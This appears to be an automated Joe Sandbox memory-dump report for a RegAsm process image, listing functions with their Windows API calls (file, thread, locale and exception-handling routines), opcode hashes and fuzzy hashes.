Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction ID: 3fe6f93935658f8ab67006e652a10cd0383134051074610e396dae59c432ecd7
Opcode Fuzzy Hash: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction Fuzzy Hash: 5DD09E31100148ABCF117F61EC0DA993F2AAF407557858025FA0A56131CB369993AA58

Function 00416DAF Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004164C2: GetConsoleOutputCP.KERNEL32(82DB3677,00000000,00000000,0040BDB8), ref: 00416525

WriteFile.KERNELBASE(FFBF5BE8,00000000,?,0040BC75,00000000,00000000,00000000,00000000,?,?,0040BC75,?,?,004328B8,00000010,0040BDB8), ref: 00416F18
GetLastError.KERNEL32(?,0040BC75,?,?,004328B8,00000010,0040BDB8,?,?,00000000,?), ref: 00416F22

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction ID: cb585fdb2482b244a4d3bef91fab55670e651a1c55327e645a67e42ff2a15e13
Opcode Fuzzy Hash: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction Fuzzy Hash: 4461D775D04249AFDF10CFA8C844AEF7FB9AF09308F16415AF804A7252D379D986CB69

Function 00414A96 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00414AE2
GetFileType.KERNELBASE(00000000), ref: 00414AF4

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 14da27bdb5d952759cc947a18c1f6313485b17a09da5127208cbfccaf6a1781a
Instruction ID: 68df3f11dd2f645efc31e1e90aadc3e75d180b75955679e0b2236dab09e8ba97
Opcode Fuzzy Hash: 14da27bdb5d952759cc947a18c1f6313485b17a09da5127208cbfccaf6a1781a
Instruction Fuzzy Hash: 141175712087514AC7308E3E9C887637AD4ABD6370B39071BD1B6962F1C328E9C6965D

Function 00403EE0 Relevance: 3.0, APIs: 2, Instructions: 22
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004038C0,00000000,00000000,82DB3677), ref: 00403F06
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403F0F

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
Instruction ID: 9ada69c4f7ca39928594594d106047c4e65b58e1a3541a0c5f1fc3d2bb6a9bfa
Opcode Fuzzy Hash: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
Instruction Fuzzy Hash: 10E08675758300BBD710EF24EC07F1A3BE4BB48B05F914A39F295A62D0D674B404965E

Function 00414D5D Relevance: 2.6, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DB3
GetLastError.KERNEL32(?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DBD

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction ID: ceb111eb948f9657ebdeceefd9bfba8073a9b29251fc9eed98a790ab6a2c0bec
Opcode Fuzzy Hash: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction Fuzzy Hash: 06114C336041241ADB246635BC867FE6749CBC1738F290A5FF808C72C1DE388CC2929C

Function 004143CC Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction ID: d7b25293e7db54f96000769fea1aeb7630fb582f3d7d0c2fc2c622193e8995c8
Opcode Fuzzy Hash: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction Fuzzy Hash: 620128373002255F9F25CF6EEC40ADB33A6FBC07243148136FA20CB684DA34D8829799

Function 00413EF2 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00413F2C

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
Instruction ID: be02312cd07e58b193bdeee16c95f5fde802225de20a5ed1c7ae4422ede983e8
Opcode Fuzzy Hash: 86b5a37895ede01666616fd7f26fe40e68c10059cd8d9e9be6e6956d389c093e
Instruction Fuzzy Hash: 46110375A0420AAFCB05DF58E9419DB7BF9EF48304F04406AF809AB351D630EA15CBA8

Function 00414094 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,0000000C,?,?,004152D9,00000001,00000364,?,00000006,000000FF,?,?,0040E077,00415469), ref: 004140D5

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 14b8f9ac75b8980b6812ff089cde42dce8ba1f12a125e940596199f5ca44a4d3
Instruction ID: 7a371578952800d697783e4f14dfa84f7cfeb60b6085e341501622e7ba028638
Opcode Fuzzy Hash: 14b8f9ac75b8980b6812ff089cde42dce8ba1f12a125e940596199f5ca44a4d3
Instruction Fuzzy Hash: E9F0BB35605625ABDB215A63DC05BDB3F489FC5760B158123B904EB1A0CA68D9D1819D

Function 0041FB65 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94

Non-executed Functions

Function 0041EBA1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(3FC00000,2000000B,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC3A
GetLocaleInfoW.KERNEL32(3FC00000,20001004,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC63
GetACP.KERNEL32(?,?,0041EEBF,?,00000000), ref: 0041EC78

Strings

ACP, xrefs: 0041EBBF
OCP, xrefs: 0041EBF5

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction ID: 81a9d30784dd22d719d41cfb92251f6e816e7a4bc62bdb22216d11a6fc444572
Opcode Fuzzy Hash: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction Fuzzy Hash: 92218E3AB04101AADB34CF56CD05AD773A7AF50B50B568826FD0AD7211F736EE81C798

Function 0041ED76 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0041EE82
IsValidCodePage.KERNEL32(00000000), ref: 0041EECB
IsValidLocale.KERNEL32(?,00000001), ref: 0041EEDA
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041EF22
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041EF41

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
Instruction ID: eeabbf5cfaddba79e94d22b4dd48aaeada7d5b667952b3c456454f902e5df75d
Opcode Fuzzy Hash: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
Instruction Fuzzy Hash: B4519075A00315ABDF20DFA6DC41BEB77B8FF48700F54442AAD14E7290E7789980CB69

Function 0041E412 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetACP.KERNEL32(?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E4D3
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?), ref: 0041E4FE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661

Strings

utf8, xrefs: 0041E5D0

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
Instruction ID: 5e8f11e88951c7c1c9557d61489bca48d24d80555c5ca4e9e4b82e7d51b65768
Opcode Fuzzy Hash: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
Instruction Fuzzy Hash: 8F711775A00611AADB24AB77CC42BE773A8EF54708F14442BFD05D7281FB7CE9818799

Function 00415635 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004156C2

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction ID: 91afe31f9ab3d507f6121463a8ee3d13cfef47ac4a512e863f990cc27fdcea00
Opcode Fuzzy Hash: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction Fuzzy Hash: 92B15872E00645DFDB119F68C891BEEBBE5EF85310F14816BE815AB341D2389D81CBA9

Function 00407B01 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407B0D
IsDebuggerPresent.KERNEL32 ref: 00407BD9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407BF9
UnhandledExceptionFilter.KERNEL32(?), ref: 00407C03

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction ID: ca20a48664bdef0e78e9b146848890f6e34f40b99dedcfcf476291c653997e40
Opcode Fuzzy Hash: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction Fuzzy Hash: 1B314B75D0521CDBDF20DFA0D9497CDBBB8BF04304F1040AAE50DA7290EB756A859F09

Function 0041E825 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E879
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E8C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E989

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: dd539c89c5381dfdaac91928ad5ed676a1006981e28db1904c6f4bbe4cde2b34
Instruction ID: efc99f0a6d6f1c6c35933ec1b38cf6b3cd41524c9fcadcabef19194d257b4763
Opcode Fuzzy Hash: dd539c89c5381dfdaac91928ad5ed676a1006981e28db1904c6f4bbe4cde2b34
Instruction Fuzzy Hash: EB618CB59101079BDB689F26CD82BEA77A8FF04340F14417BED16C6281F738D981DB58

Function 0040DD78 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 0040DE70
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0040DE7A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 0040DE87

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b5dd4f76152aea6ca03237fb28cccd4ebdc33645a90cdebeab5d7b36533c9830
Instruction ID: 2886232a598c6d0739cb6745ed5e05dca1263a9451a5c599d013a0f88592b0f0
Opcode Fuzzy Hash: b5dd4f76152aea6ca03237fb28cccd4ebdc33645a90cdebeab5d7b36533c9830
Instruction Fuzzy Hash: 4131E574D012189BCB21DF69D98878DBBB8BF08310F5041EAE41CA7291E774AF858F48

Function 004077E0 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004077F6

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 96a2ba3aa580dc615e5e38e6a61e3a4296c942238419a14d8ec0a8789d2e52c4
Instruction ID: 853601205c21894bcdc8f75123652b739dccbac0e00907a06a8c71bf04373a9d
Opcode Fuzzy Hash: 96a2ba3aa580dc615e5e38e6a61e3a4296c942238419a14d8ec0a8789d2e52c4
Instruction Fuzzy Hash: 865180B2E056059FEB18CF54E9857AEBBF0FB48350F14913AD501EB390D378A940CB59

Function 0041B6EA Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6842ec62685f536c458231bd49ed90ba96433574387361dbf341c4072f4990b4
Instruction ID: e26fa8b462e3a3bc0dcd1cb195ad12d8a73a1b261898cc61817e46cff9ff25aa
Opcode Fuzzy Hash: 6842ec62685f536c458231bd49ed90ba96433574387361dbf341c4072f4990b4
Instruction Fuzzy Hash: 9841A3B5804219AEDB20DF69CC89AEEBBB9EF45304F1441EEE418D3201DB359E858F54

Function 0041EA78 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041EACC

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 22a4290edeb40b255e0ef88b49f21dfdd78c731e0f866b45595c0c5f80cee5a7
Instruction ID: 09566a44d01ac47d2cdad9f49e07ec0328cace9eeb3adbfa8c3b07b4827ecd72
Opcode Fuzzy Hash: 22a4290edeb40b255e0ef88b49f21dfdd78c731e0f866b45595c0c5f80cee5a7
Instruction Fuzzy Hash: D321AF36605206ABDB28DE26DD42AFB73A8EF44314B10407FED02D6241EB78AD81CB58

Function 0041E6FF Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041E825,00000001,00000000,?,-00000050,?,0041EE56,00000000,?,?,?,00000055,?), ref: 0041E771

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 9637497d46bd12567f8eabdc0472934baf484039a92a8dbd1bfa50b3c5102b1b
Instruction ID: f28f85ac1fea5866725ce88a4d547c14bcace0560233e7335010750b785556cb
Opcode Fuzzy Hash: 9637497d46bd12567f8eabdc0472934baf484039a92a8dbd1bfa50b3c5102b1b
Instruction Fuzzy Hash: F0112C3A6007019FEB189F3AD8916FAB791FF80368B14442ED95747740E7757843C744

Function 0041ECA7 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0041EB22,00000000,00000000,?), ref: 0041ECD3

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction ID: 6e93bce3e8a9596dc076f6a872b53f7d727095e2315f943068ff1bd0afa52940
Opcode Fuzzy Hash: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction Fuzzy Hash: 56F02D3A600113BFDB245B26EC09BFB7764EB40354F19442AEC06A3280EA78FDC2C694

Function 0041E60D Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661

Strings

utf8, xrefs: 0041E5D0

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 2152daac5f42ae25a129a23ac8d896ce75da55d7df13b3f6dfbcda70826a3db5
Instruction ID: d369d087f973f2c2e7390e19339e1b86590d8fa7fa541369cb1b30fd3d4077c9
Opcode Fuzzy Hash: 2152daac5f42ae25a129a23ac8d896ce75da55d7df13b3f6dfbcda70826a3db5
Instruction Fuzzy Hash: B0F0F436A10105ABC714AF25DC45FFA73A8EB84324F40007EAA02D7281EA78AD418758

Function 0041E79A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041EA78,00000001,45F1B473,?,-00000050,?,0041EE1A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0041E7E4

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7822a5e4b117a09642d2d9f73cbe77476052005b15321de9f48d0f235ef5c92f
Instruction ID: 0c0c1f316863ef4a6d30beb722119c93d5a9d1266b3f20af8045389666d513f6
Opcode Fuzzy Hash: 7822a5e4b117a09642d2d9f73cbe77476052005b15321de9f48d0f235ef5c92f
Instruction Fuzzy Hash: BDF0C23A2003045FEB249F3A9881ABABB95FF80368F15442EFD568B690D6759C82C718

Function 00414138 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040E0C6: EnterCriticalSection.KERNEL32(?,?,00412EDC,00000000,00432B68,0000000C,00412EA3,0000000C,?,004140C7,0000000C,?,004152D9,00000001,00000364,?), ref: 0040E0D5

EnumSystemLocalesW.KERNEL32(0041412B,00000001,00432BE8,0000000C,0041455A,00000000), ref: 00414170

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 80f246e533dc21f73d9613eff5259b5841ca6d0f841dd3ce2907f16627d73c59
Instruction ID: 198ab3507c4040aae18c9164df511e00e81c972c753b4360ebc7eca8a0771405
Opcode Fuzzy Hash: 80f246e533dc21f73d9613eff5259b5841ca6d0f841dd3ce2907f16627d73c59
Instruction Fuzzy Hash: 14F03C72A14204DFD710EF99E842B9C77B0FB84725F10422BE811DB2A0C7B959409B98

Function 0041E6B4 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041E60D,00000001,45F1B473,?,?,0041EE78,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E6EB

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 8c2aaa4c0cd0d54cc735e91a7a0ddb58f51471a544283acf310fccb30414098b
Instruction ID: d7e3b5c502124c080ac9a43a58f0728b4bb26e435a168ea3e401fe3e83efba30
Opcode Fuzzy Hash: 8c2aaa4c0cd0d54cc735e91a7a0ddb58f51471a544283acf310fccb30414098b
Instruction Fuzzy Hash: A9F0E53A30025597CB149F3AD8557AABF94EFD1724F87405AEE06CB250C6799883C758

Function 0041465E Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00412A47,?,20001004,00000000,00000002,?,?,00412049), ref: 00414692

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction ID: f9bd5592f4a27906ba0b7000611c056f456b6c13901b9127fc06cc884ae94f8f
Opcode Fuzzy Hash: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction Fuzzy Hash: 63E04F31540268BBCF122F61DC04EEE3F19FF85761F064026FC1566261CB7A9D61AA9D

Function 00407C63 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007C6F,00407287), ref: 00407C68

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 91f082824127807ca67e9bea16e4e1142dcaa675fdc02378074aa91e014118a9
Instruction ID: 0ff61591fe6e7fdbf664e27eab8a47433d3f920744837751a1e33914f5cec1be
